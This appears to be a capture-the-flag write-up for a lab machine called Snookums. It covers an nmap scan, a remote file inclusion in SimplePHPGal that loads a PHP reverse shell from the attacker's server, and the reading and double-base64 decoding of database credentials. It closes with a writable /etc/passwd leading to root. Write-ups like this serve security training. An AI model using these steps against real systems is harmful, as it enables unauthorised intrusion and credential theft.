Snookums
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 192.168.197.58
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 22:49 +08
Warning: 192.168.197.58 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.197.58
Host is up (0.17s latency).
Not shown: 65484 filtered tcp ports (no-response), 43 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
33060/tcp open mysqlx
Lots of ports open.
PHP Gallery -> RFI + RCE
Port 80 was running a Simple PHP Photo Gallery instance:

This thing might be vulnerable to an RFI based on searchsploit
:
$ searchsploit SimplePHP
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execu | php/webapps/7079.txt
SimplePHPGal 0.7 - Remote File Inclusion | php/webapps/48424.txt
The PoC is quite simple to test:
### Poc :
[+] site.com/image.php?img= [ PAYLOAD ]
And it does work since I can make the website send requests to my HTTP server:

To exploit this, we can just host a PHP reverse shell from PentestMonkey and make the website call it by visiting http://192.168.197.58/image.php?img=http://192.168.45.177/rev.php.

Privilege Escalation
SQL Creds -> Michael Shell
Within the /var/www/html
file, there's a db.php
folder that contains MySQL credentials:
bash-4.2$ cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
Using this, we can login using mysql
:
bash-4.2$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Within the MySQL database there were some credentials:
mysql> show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> select * from users
-> ;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
These are just base64
encoded strings, and we can easily find the cleartext passwords. michael
is the only user within /home
, so we can decode his password:
$ echo 'U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==' | base64 -d | base64 -d
HockSydneyCertify123
Then, just use su
:

Grab the user flag.
Writeable /etc/passwd -> Root
michael
owns /etc/passwd
. This is findable by running linpeas.sh
:
[michael@snookums ~]$ ls -la /etc/passwd
-rw-r--r--. 1 michael root 1162 Jun 22 2021 /etc/passwd
Using this, we can easily create a new root user.

Rooted!
Last updated